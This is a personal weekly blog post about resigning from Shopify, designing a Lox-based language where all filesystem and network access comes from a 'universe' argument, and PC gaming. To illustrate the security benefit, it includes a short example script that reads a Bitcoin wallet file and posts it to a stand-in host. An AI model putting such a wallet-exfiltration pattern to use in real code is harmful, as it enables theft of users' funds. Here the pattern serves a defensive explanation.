Weeknotes 2022 W22: Resignation
The most important news first: I have resigned from Shopify. This month, June, will be my last, and because I’m taking up my remaining vacation days, I’ll be at Shopify for only two-and-a-half more weeks.
I might elaborate on my reasons for leaving Shopify in the future, if and when I feel like it.
No gremlins this time, but other people have reported their technology acting up. Perhaps I’ve infected them.
I keep on working on my variant of Lox (from the Crafting Interpreters book). It is evolving, and the programming language needs a new name — it really is no longer Lox.
I compared the performance of the tree-walking interpreter and the VM, and the difference is astounding: for a Fibonacci implementation, the VM was about 60 times faster. That’s huge.
You might be asking why I am working on my own programming language and a compiler and VM for it. A good question, though not easy to answer. The way I see it:
-
It’s a solid challenge. Creating and implementing a programming language is not easy. It requires specific techniques, and quite a different way of thinking. It’s mind-bending at times.
-
It is creative. I’ve been lacking creative outlets lately, and this fills the gap. Designing a programming language involves a ton of creativity.
-
I get to test out new ideas. For example, what if we had a language that looked like Ruby, but with a genuine module system? I believe questions like these can only be answered by creating an implementation in the first place.
-
It’s fun. It’s fun in the same way that puzzle games are fun.
For this programming language, I also have one very specific goal in mind. It is to answer this question: What if a programming language truly had no globals — and that includes the filesystem and the network?
What I’m thinking about is a language where the external world (the “universe”) is passed in as an argument to the main function, and nothing else has access to this universe:
fun __main__(universe) {
universe.stdout.println("Hello, world!");
}
There is no global stdout object. There are no global printf() or puts() functions. To write to standard out, you need a reference to that stdout object, which can only come from the universe parameter of the main function:
fun say_hi(stdout) {
stdout.println("Hi there");
}
fun __main__(universe) {
say_hi(universe.stdout);
}
Here, say_hi() can write to standard out, because stdout got passed in.
Passing around dependencies like this makes code look more convoluted, but it has the huge advantage that dependencies are explicit. I can tell what effects a function can have simply by looking at its parameters. If the filesystem isn’t passed in as an argument to a function, that function simply cannot access the filesystem.
This is an excellent property from a security point of view: external packages don’t have free reign over the network and filesystem, and can’t do nasty things like steal bitcoin wallets or steal AWS credentials.
I could write a Bitcoin-stealing script:
fun __main__(universe) {
var wallet = universe.filesystem.read(
"~/.bitcoin/wallet.dat",
);
universe.http.post(
"https://example.com/steal-ur-coins",
wallet,
);
}
… but a third-party package wouldn’t be able to do that behind my back, because it’d have access to neither universe.filesystem nor universe.http.
A third-party package could request you to pass in universe (or parts of it, like filesystem) but that should be a red flag. In most modern programming languages, you’re effectively passing in universe to every function, implicitly.
Furthermore, if a function requires access to the filesystem, you could pass in a read-only filesystem proxy instead, or a filesystem that is scoped to a particular directory, effectively creating a sandbox. Not only is this good from a security point of view, it also greatly improves testability.
This universe would provide access to the network, the filesystem, environment variables, sources of randomness, command-line arguments, the current date and time, the current geo-location, and more.
These ideas are worth exploring, but require an entire new programming language. These ideas cannot be retrofitted into an existing language.
See also: A globally available filesystem is a security liability.
Let’s talk entertainment!
I upgraded my gaming PC, and it’s working very smoothly.
I was initially disappointed as I fired up Cyberpunk 2077 and it was running at only about 20 frames per second. Then I realized that it reset itself to the highest graphics settings, and ray tracing turned all the way up to ultra — but with that configuration, it’s amazing it even runs at 20fps!
Though with settings tuned to more reasonable levels, Cyberpunk 2077 occasionally still slows down to about 5 frames per second. It’s a very buggy game, still.
In other gaming news, I bought the Destiny 2 Witch Queen expansion. Destiny 2 looks amazing yet runs super smooth. Gameplay-wise, I feel like I’ve not quite understood how to play it well. Too many different buttons to press and too many complicated screens! I’m getting there, though. I’m looking forward to doing more co-operative multiplayer.
I picked up Satisfactory again, which runs a lot better after the gaming PC upgrade. I’m not particularly good at it, but I like the creativity that goes into it. I get to design factories! It’s all about esthetics!
Links:
-
The Carbon Offset Problem (Wendover Productions)
-
Star Trek and Radical Hope (Renegade Cut)
-
Why are there no bridges in East London? (Jay Foreman): Ooh, another episode for the long-running Unfinished London YouTube series!
-
Some interesting (lightning) talks from the HYTRADBOI (Have you tried rubbing a database on it?) conference:
It wouldn’t be me if I didn’t include any cryptocurrency articles:
-
Bitcoin and other crypto scams are taking more money than ever, FTC says (Vox Recode). Quote: “2022 is on track to be the biggest year for cryptocurrency fraud.” Yay?
-
Letter in Support of Responsible Fintech Policy: This letter, addressed to US Congress, urges to resist the crypto industry’s lobbying influence. I signed the letter as well, and you can too — don’t delay, though, as the deadline is June 10th. Here is some press coverage of the letter: